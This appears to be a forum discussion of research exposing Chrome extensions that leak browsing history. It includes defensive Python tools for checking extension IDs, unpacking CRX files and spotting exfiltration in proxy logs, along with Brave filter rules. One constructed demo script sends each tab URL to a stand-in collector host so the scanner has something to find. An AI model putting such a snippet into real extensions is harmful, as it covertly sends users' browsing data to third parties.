Over 15 years ago now, I had a popular chrome extension that did a very specific thing. I sold it for a few thousand bucks and moved on. It seemed a bit strange at the time, and I was very cautious in the sale, but sold it and moved on.
It's abundantly obvious to me now that bad actors are purchasing legitimate chrome extensions to add this functionality and earn money off the user's data (or even worse). I have seen multiple reports of this pattern.
gnl
Couple of quick thoughts on how to protect yourself from having a formerly trustworthy extension go rogue on you:
- https://github.com/beaufortfrancois/extensions-update-notifi...
And then you can do whatever you feel is an appropriate amount of research whenever a particularly privileged extension gets updated (check for transfer of ownership, etc.)
- brave://flags/#brave-extension-network-blocking
You can then create custom rules to filter extension traffic under brave://settings/shields/filters
e.g.:
! Obsidian Web
*$domain=edoacekkjanmingkbkgjndndibhkegad
@@||127.0.0.1^$domain=edoacekkjanmingkbkgjndndibhkegad
- Clone the GitHub repo, do a security audit with Claude Code, build from source, update manually
singularfutur
This is why I only run open source extensions that I can actually audit. uBlock Origin, SponsorBlock, the kind of tools where the code is available and the developer isn't anonymous. The Chrome Web Store is basically unregulated and Google doesn't care as long as they get their cut. Open source at least gives you a chance to see what you're installing before it starts exfiltrating your data to some server in a country you've never heard of.
kwar13
The code is usually minified and heavily obfuscated but you CAN view the source code for any extension:
https://kaveh.page/snippets/chrome-extensions-source-code
Even a tiny extension like this one I wrote with 2k users gets buyout offers all the time to turn it into malware: https://chromewebstore.google.com/detail/one-click-image-sav...
My daughter, in grade school, uses a Chromebook at school and accesses Google Classroom through Chrome. The school has very few restrictions on extensions and when I log into her account, Chrome is littered with extensions. They're all innocuous (ex. change the cursor into a cat, pets play around on your screen, etc.). However, without fail, each time I log in and go to the extension page, Chrome notifies me that one or more of the extensions was removed due to malicious activity or whatever.
ravenstine
This is why I disable automatic updates. Not just for browser extensions but everything. This whole "you gotta update immediately or you're gonna get hacked" thing is a charade. If anything, if you update you'll be hacked at this point.
matheusmoreira
And the ones that are not will probably get bought out at some point and become malware as well.
The only extension I trust enough to install on any browser is uBlock Origin.
l72
The fact that most of these are capturing query parameters:
"u": "https://www.google.com/search?q=target",
indicates they are capturing tons of authentication tokens. So this goes way beyond just spying on your browser history.
revicon
If you're on a mac, you can list all the IDs of your installed browser extensions across all your profiles like this...
find "$HOME/Library/Application Support/Google/Chrome" \
-type d -path "*/Extensions/*" -not -path "*/Extensions/*/*" \
-print 2>/dev/null | sed 's#.*/Extensions/##' | sort -u
Compare to the list of bad extensions. I stuck a stripped down list here...
And why didn't one of the wealthiest companies of the world capture this themselves?
Considering the barriers they build to prevent adblockers, that doesn't shine a good light on them.
nipperkinfeet
Stylus is a good alternative to Stylish. I keep my extensions to a minimum, and I turn off the ones I don't need until I need to use them. The only extensions I have turned on all the time are uBlock, Humble New Tab Page, and Stylus.
georgehill
At this point, someone should make a site to check whether installed extensions are malicious or not.
cebert
Hopefully people will start learning that you want to install as few browser extensions as possible.
Made a quick tool so you can check if your extensions are on the list: https://extensioncheck.val.run
1. Go to chrome://extensions and toggle Developer mode on (so IDs are visible)
2. Select all text on the page with your mouse and copy
3. Paste it into the tool
It parses the IDs and warns you if any are among the 287 spyware extensions.
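Added example, not from the thread and not the extensioncheck tool's own code: a Python script that does both checks offline. It lists extension IDs from a Chrome user-data directory the way the `find` command earlier in the thread does on a Mac (every profile's `Extensions/<id>/` directory), pulls IDs out of text pasted from chrome://extensions, and matches both against a blocklist. The IDs, the blocklist and the profile tree it builds are constructed for the demo; swap in the published list of flagged IDs and your real user-data path.

```python
import os
import re
import tempfile
from pathlib import Path

# A Chrome extension ID is 32 characters from a-p: the first 32 hex digits of
# sha256(public key DER) with 0-f remapped to a-p.
EXT_ID_RE = re.compile(r"\b[a-p]{32}\b")

# Constructed IDs for this example; they do not belong to real extensions.
BENIGN_ID = "abcdefghijklmnopabcdefghijklmnop"
SPYWARE_ID = "ponmlkjihgfedcbaponmlkjihgfedcba"

# Constructed blocklist. Replace with the published list of flagged IDs.
BLOCKLIST = {SPYWARE_ID, "aaaabbbbccccddddeeeeffffgggghhhh"}


def installed_extension_ids(user_data_dir):
    """IDs installed in any profile under a Chrome user-data directory.

    Chrome stores each extension at <profile>/Extensions/<id>/<version>/,
    where <profile> is 'Default', 'Profile 1', ... directly under the
    user-data dir (macOS: ~/Library/Application Support/Google/Chrome,
    Linux: ~/.config/google-chrome).
    """
    ids = set()
    for ext_dir in Path(user_data_dir).glob("*/Extensions/*"):
        if ext_dir.is_dir() and EXT_ID_RE.fullmatch(ext_dir.name):
            ids.add(ext_dir.name)
    return ids


def ids_from_pasted_text(text):
    """IDs found in text copied from chrome://extensions (Developer mode on,
    so every card shows an 'ID: <32 chars>' line)."""
    return set(EXT_ID_RE.findall(text))


def check_against_blocklist(ids, blocklist=BLOCKLIST):
    """The subset of ids that are on the blocklist, sorted for stable output."""
    return sorted(set(ids) & set(blocklist))


def build_demo_user_data_dir():
    """Constructed user-data tree with two profiles so the script runs offline."""
    root = tempfile.mkdtemp(prefix="chrome-demo-")
    layout = [
        ("Default", BENIGN_ID, "1.2.3_0"),
        ("Profile 1", BENIGN_ID, "1.2.3_0"),
        ("Profile 1", SPYWARE_ID, "4.0.0_0"),
    ]
    for profile, ext_id, version in layout:
        os.makedirs(os.path.join(root, profile, "Extensions", ext_id, version))
    # A non-ID directory under Extensions/ that the regex must ignore.
    os.makedirs(os.path.join(root, "Default", "Extensions", "Temp"))
    return root


# Constructed paste: roughly what chrome://extensions yields when copied.
PASTED_PAGE = f"""
Demo Tab Manager
ID: {BENIGN_ID}
Details  Remove
Cool Cursors
ID: {SPYWARE_ID}
Details  Remove
"""

if __name__ == "__main__":
    on_disk = installed_extension_ids(build_demo_user_data_dir())
    print("installed:", sorted(on_disk))
    print("flagged on disk:", check_against_blocklist(on_disk))
    print("flagged in paste:", check_against_blocklist(ids_from_pasted_text(PASTED_PAGE)))
```

The on-disk walk is the more reliable of the two, since it sees every profile rather than only the one whose extensions page you happened to copy; an extension that Chrome has already disabled or removed still leaves its directory behind until the profile is cleaned up, so a hit there is worth checking against the extensions page before concluding it is still active.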
mentalgear
Browser extensions have much looser security than you would think: any extension, even if it just claims to change the style of a website, can see your input type=password fields - it's ludicrous that access to those does not need its own permission!
ghtbircshotbe
Capital One just offered me $45 to install a Firefox extension. I declined, though I'm sort of tempted to get paid for getting spied on, which I assume is happening anyway. And who knows, maybe I could get a couple more bucks later in the class action.
https://addons.mozilla.org/en-US/firefox/addon/wikibuy-for-f...
@qcontinuum1 appreciate this kind of research. saw your other comments and you mentioned that the team's engineering resources are scarce + saw that at the bottom of the github repo that there are links to BTC address.
curious to know:
1- how large your team is? and how long this research took? it is very thorough and knowing such a detail might encourage others to participate in a joint effort in performing this kind of research
2- if this kind of research is your primary focus?
3- if there are other ways that financial support can be provided other than through xrp or btc?
i tried to look up your profiles but wasn't able to find where you were all from, so wishing you well wherever you are in the world. :)
Pacers31Colts18
I think the industry needs to rethink extensions in general. VSCode and browser extensions seem to have very little thorough review or thought into them. A lot of enterprises aren't managing them properly.
baby
I've always thought that it's crazy how so many extensions can basically read the content of the webpages you browse. I'm wondering if the research should go further: find all extensions that have URLs baked into them or hashes (of domains?), then check what they do when you visit these URLs.
herf
You know, LLMs could do automated code reviews for each update to avoid things like this. It would be much better than unexamined updates.
singularity2001
The whole browser is spying on you, so don't worry about extensions
the_gipsy
Remember when google removed extension APIs so that things like uBlock origin stopped working in Chrome, in the name of "security"?
Pepperidge farm remembers.
molticrystal
Using the below page you can check your extensions: select all your extensions on chrome://extensions/ (everything on the page; it will filter out the IDs) and it will check if any IDs match.
https://output.jsbin.com/gihukasezo/
or
https://jsfiddle.net/9kLsv3xm/latest/
or
https://pastebin.com/Sa8RmzcE
Can extensions:
be scoped, meaning only allowed to read/access when you visit a particular domain whitelist (controlled by the user)?
be forced (by the extension API) to have a clear non-obfuscated feed of whatever they send that the user can log and/or tap onto and watch at any time?
If not, I wouldn't touch them with a 10000ft pole.
Grom_PE
It seems crazy to me that the offered way to install an extension on Chrome is to click a button on a privileged website, and then the installed extension autoupdates without an option to turn it off.
I hate the idea of installing stuff without an ability to look at what's inside first, so what I did was patch the Chromium binary, replacing all strings "chromewebstore.google.com" with something else, so I can inject custom JS into that website and turn the "Install" button into a "Download CRX" button. After downloading, I can unpack the .crx file and look at the code, then install via "Load unpacked" and it never updates automatically. This way I'm sure only the code I've looked at gets executed.
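Added example, in Python and not anyone's code from this thread: an unpacker for the CRX3 container that the "Download CRX, look inside, Load unpacked" workflow above starts from, plus a first-pass scan of the unpacked JS for hard-coded hosts, which is the static half of the earlier suggestion to find extensions with URLs baked into them. It reads the documented CRX3 layout (the "Cr24" magic, version and header-length words, a CrxFileHeader protobuf, then a plain zip), checks that the ID declared in the signed header is really derived from one of the signing keys the way Chrome derives IDs, and returns the manifest and JS sources. It does not verify the signatures; Chrome does that on install, and doing it here would need an RSA/ECDSA library. The demo key, manifest and background script are constructed and stand for no real extension.

```python
import hashlib
import io
import json
import re
import struct
import zipfile
from urllib.parse import urlparse

ID_ALPHABET = "abcdefghijklmnop"
URL_RE = re.compile(r"""https?://[^\s"'`)]+""")

# Minimal protobuf wire-format helpers. The CRX3 header only uses
# length-delimited (wire type 2) fields, so that is all we handle.
def _enc_varint(n):
    out = bytearray()
    while n > 0x7F:
        out.append((n & 0x7F) | 0x80)
        n >>= 7
    out.append(n)
    return bytes(out)

def _dec_varint(buf, pos):
    result = shift = 0
    while True:
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7

def _len_field(number, data):
    return _enc_varint((number << 3) | 2) + _enc_varint(len(data)) + data

def parse_fields(buf):
    """Decode a message into {field_number: [value_bytes, ...]}."""
    fields, pos = {}, 0
    while pos < len(buf):
        tag, pos = _dec_varint(buf, pos)
        if (tag & 7) != 2:
            raise ValueError(f"unexpected wire type {tag & 7} in CRX header")
        length, pos = _dec_varint(buf, pos)
        fields.setdefault(tag >> 3, []).append(buf[pos:pos + length])
        pos += length
    return fields

def _hex_to_id(hex_digits):
    return "".join(ID_ALPHABET[int(c, 16)] for c in hex_digits)

def extension_id_from_key(public_key_der):
    """Chrome's ID derivation: first 32 hex digits of sha256(key DER), 0-f -> a-p."""
    return _hex_to_id(hashlib.sha256(public_key_der).hexdigest()[:32])

def unpack_crx3(blob):
    """Split a CRX3 blob into header facts plus the manifest and JS it carries.
    Layout: b"Cr24", uint32 LE version 3, uint32 LE header length, then the
    CrxFileHeader protobuf (fields 2/3: AsymmetricKeyProof{1: public_key,
    2: signature}; field 10000: SignedData{1: crx_id, 16 bytes}), then a zip.
    Signatures are not verified here; Chrome does that at install time."""
    if blob[:4] != b"Cr24":
        raise ValueError("not a CRX file")
    version, header_len = struct.unpack_from("<II", blob, 4)
    if version != 3:
        raise ValueError(f"only CRX3 is handled, got version {version}")
    header = parse_fields(blob[12:12 + header_len])
    keys = [parse_fields(proof)[1][0] for proof in header.get(2, []) + header.get(3, [])]
    declared_id = _hex_to_id(parse_fields(header[10000][0])[1][0].hex())
    with zipfile.ZipFile(io.BytesIO(blob[12 + header_len:])) as archive:
        manifest = json.loads(archive.read("manifest.json"))
        sources = {n: archive.read(n).decode("utf-8", "replace")
                   for n in archive.namelist() if n.endswith(".js")}
    return {"declared_id": declared_id,
            # The ID Chrome will show must come from a key that signed this file.
            "id_matches_key": any(extension_id_from_key(k) == declared_id for k in keys),
            "manifest": manifest, "sources": sources}

def scan_outbound_urls(sources):
    """Hostnames hard-coded in each JS file: a first-pass triage of where it talks to."""
    return {name: {urlparse(u).hostname for u in URL_RE.findall(text)}
            for name, text in sources.items()}

# Constructed CRX for running offline; key, manifest and code are made up.
DEMO_PUBKEY = b"constructed-demo-key-not-a-real-DER-blob"
DEMO_MANIFEST = {"manifest_version": 3, "name": "Demo Extension", "version": "1.0",
                 "permissions": ["tabs"], "host_permissions": ["<all_urls>"]}
DEMO_BACKGROUND_JS = (
    'chrome.tabs.onUpdated.addListener((id, info, tab) => {\n'
    '  fetch("https://collector.example/log?u=" + encodeURIComponent(tab.url));\n'
    '});\n'
)

def build_demo_crx():
    zip_buf = io.BytesIO()
    with zipfile.ZipFile(zip_buf, "w") as archive:
        archive.writestr("manifest.json", json.dumps(DEMO_MANIFEST))
        archive.writestr("background.js", DEMO_BACKGROUND_JS)
    crx_id = hashlib.sha256(DEMO_PUBKEY).digest()[:16]
    proof = _len_field(1, DEMO_PUBKEY) + _len_field(2, b"\x00" * 8)  # placeholder signature
    header = _len_field(2, proof) + _len_field(10000, _len_field(1, crx_id))
    return b"Cr24" + struct.pack("<II", 3, len(header)) + header + zip_buf.getvalue()
```

Point `unpack_crx3` at the bytes of a downloaded .crx, write the zip payload out for "Load unpacked", and read `manifest` (especially `host_permissions` and `permissions`) and the host list before deciding whether the code is worth reading line by line. The hostname scan is deliberately crude: it misses URLs assembled at runtime or hidden behind obfuscation, which is exactly what the dynamic MITM approach in the research catches, so treat an empty result as "nothing obvious" rather than "clean".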
hannob
That can't be true, right? I mean, Google broke Adblockers in Chrome to prevent this very issue. And it had absolutely nothing to do with Google's Ad business.
So it's completely impossible that such malicious extensions still exist.
(may contain sarcasm)
captn3m0
If someone would like to replicate, a good approach would be to reduce the cost by removing the full-Chromium engine. I doubt these extensions are trying to do environment detection and won't run under (e.g.) JSDOM+Bun with a Chrome API shim.
ArcaneMoose
Extensions have too many security risks for me. At this point I'd rather just vibe code my own extension than trust something with so much access and unpredictable ownership.
hackinthebochs
Load extensions in developer mode so they can't silently install malware on you
nanobuilds
The browsing data itself is only half the problem. Even if you remove the spying extension, the profile it helped build persists and keeps shaping what you see as it gets sold and changes hands.
We focus a lot on blocking data collection and spyware, but not enough on what happens after the data is already collected/stolen and baked into your algorithmic identity. So much of our data is already out there.
endsandmeans
Most of them jump out as immediately dodgy -- except Stylish. That is the only one I've ever used on the list, but it's been several years.
nkmnz
Is there a way to use extensions from a private repository only, where I control the code and build pipeline?
bennydog224
It’s obvious CWS has given up on oversight of these extensions. It’s a minefield.
rkagerer
Here are 3 examples identified in their results.
Play Store pages for all 3 list strong assurances about how the developer declares no data is being sold to third parties, or collected unrelated to the item's core functionality.
Brave Web browser (runapps.org) https://chromewebstore.google.com/detail/mmfmakmndejojblgcee...
Handbrake Video Converter (runapps.org) https://chromewebstore.google.com/detail/gmdmkobghhnhmipbppl...
JustParty: Watch Netflix with Friends (JustParty.io) https://chromewebstore.google.com/detail/nhhchicejoohhbnhjpa...
My open question to Google is: What consequences will these developers face for lying to you and your users, and why should I have any faith at all in those declarations?
lapcat
> We built an automated scanning pipeline that runs Chrome inside a Docker container, routes all traffic through a man‑in‑the‑middle (MITM) proxy, and watches for outbound requests that correlate with the length of the URLs we feed it.
The biggest problem here is that "We" does not refer to Google itself, who are supposed to be policing their own Chrome Web Store. One of the most profitable corporations in world history is totally negligent.
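The correlation test the quoted pipeline describes, as an added example in Python rather than the researchers' own code: the scanner feeds the browser URLs whose lengths vary a lot from visit to visit, the proxy logs every outbound request with the visit it happened during, and a destination whose request size rises in step with the fed URL length is the one carrying the URL. The visit plan and the proxy log below are constructed (three hosts: one that exfiltrates the URL with fixed framing, one constant-size beacon, one with unrelated sizes); the log line format is mine, not mitmproxy's.

```python
import math
import re
from collections import defaultdict

# Constructed visit plan: URL lengths chosen to differ a lot between visits
# (e.g. a padded query string) so a payload that carries the URL tracks them.
FED_URL_LENGTHS = [60, 120, 200, 350, 500, 800]

# Constructed proxy log (not a real capture): one line per outbound request,
# tagged with the visit it happened during. collector.example sends 48 bytes
# of framing plus the URL; cdn.example sends a fixed-size request;
# api.example sends sizes unrelated to the URL.
PROXY_LOG = """\
visit=0 host=collector.example bytes=108
visit=0 host=cdn.example bytes=312
visit=0 host=api.example bytes=410
visit=1 host=collector.example bytes=168
visit=1 host=cdn.example bytes=312
visit=1 host=api.example bytes=395
visit=2 host=collector.example bytes=248
visit=2 host=cdn.example bytes=312
visit=2 host=api.example bytes=420
visit=3 host=collector.example bytes=398
visit=3 host=cdn.example bytes=312
visit=3 host=api.example bytes=400
visit=4 host=collector.example bytes=548
visit=4 host=cdn.example bytes=312
visit=4 host=api.example bytes=415
visit=5 host=collector.example bytes=848
visit=5 host=cdn.example bytes=312
visit=5 host=api.example bytes=405
"""

LOG_RE = re.compile(r"visit=(\d+) host=(\S+) bytes=(\d+)")


def parse_proxy_log(text, url_lengths):
    """Group outbound request sizes by host as (fed_url_length, bytes) pairs."""
    samples = defaultdict(list)
    for m in LOG_RE.finditer(text):
        visit, host, nbytes = int(m[1]), m[2], int(m[3])
        samples[host].append((url_lengths[visit], nbytes))
    return dict(samples)


def pearson(xs, ys):
    """Pearson correlation; None when either series is constant (undefined)."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    sxx = sum((x - mx) ** 2 for x in xs)
    syy = sum((y - my) ** 2 for y in ys)
    if sxx == 0 or syy == 0:
        return None
    sxy = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    return sxy / math.sqrt(sxx * syy)


def flag_exfil_hosts(samples, threshold=0.9, min_visits=5):
    """Hosts whose outbound payload size rises with the fed URL length.

    A constant-size beacon (telemetry ping, CDN fetch) has undefined
    correlation and is never flagged; a host seen on too few visits is
    skipped so one or two coincidences cannot trigger an alert.
    """
    flagged = {}
    for host, pairs in samples.items():
        if len(pairs) < min_visits:
            continue
        r = pearson([p[0] for p in pairs], [p[1] for p in pairs])
        if r is not None and r >= threshold:
            flagged[host] = round(r, 3)
    return flagged


if __name__ == "__main__":
    print(flag_exfil_hosts(parse_proxy_log(PROXY_LOG, FED_URL_LENGTHS)))
```

Two caveats a practitioner would want before trusting this signal: an extension that hashes, compresses or batches URLs before sending breaks the linear relation, so a stronger variant searches the decrypted request bodies for the padded token itself (which requires the proxy's CA to be trusted in the test profile); and the test only fires on URL-length exfiltration, so an extension that phones home only from specific domains, or after a delay, needs those domains in the visit plan and a long enough soak.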
neya
Nobody is going to even do anything about SimilarWeb for pulling this off?
My understanding from the article is that they're actively behind this.
When I was the CTO in a previous role, SimilarWeb approached us. I read through the code snippet they gave us to inject onto our site. It was a sophisticated piece of borderline spyware that didn't care about anyone in the entire line of sight - including us. They not only were very persistent, they also had a fight with our management - for refusing to use their snippet. They wanted our data so bad (we had very high traffic at the time). All we wanted was decent analytics for reporting to senior management and Google had just fucked up with their GA4 migration practices. I switched them to Plausible.io and never looked back. It was the least I could do, we had to trade-off so many data points in comparison to GA, but still works flawlessly till date. Fuck SimilarWeb.
bittercucumber
Only 37M? I'd have guessed a higher number than that.
ubermonkey
I legit do not understand the Chrome hegemony.
PlatoIsADisease
My initial solution was:
>Before installing, make each user click a checkbox what access the extension has
However, as I've seen on Android, updates do happen, and you are not asked if new permissions are granted. (Maybe they do ask, but this is after an update has automatically taken place and new code is installed.)
Here are the two solutions I have, neither are perfect:
>Do not let updates automatically happen for security reasons. This prevents a change in an App becoming malware, but leaves the app open to Pegasus-like exploits.
>Let updates automatically happen, but leaves you open to remote, unapproved installs.
kgwxd
Yo dawg...
croes
Just create an AI service and users will voluntarily send you all their data.
No need for such complicated attacks /s
nekusar
Yes, and?
Chrome/Google/Alphabet is spying on 100% of their users.
Quit using Alphabet stuff, and your exploitation factor goes down a LOT.
PurpleRamen
I don't really understand the complaint here. It seems most of those extensions have it as their literal purpose to send the active URL and get additional information back, for doing something locally with it.
And why does this site have no scrollbar?? WTF, is web design finally that broken?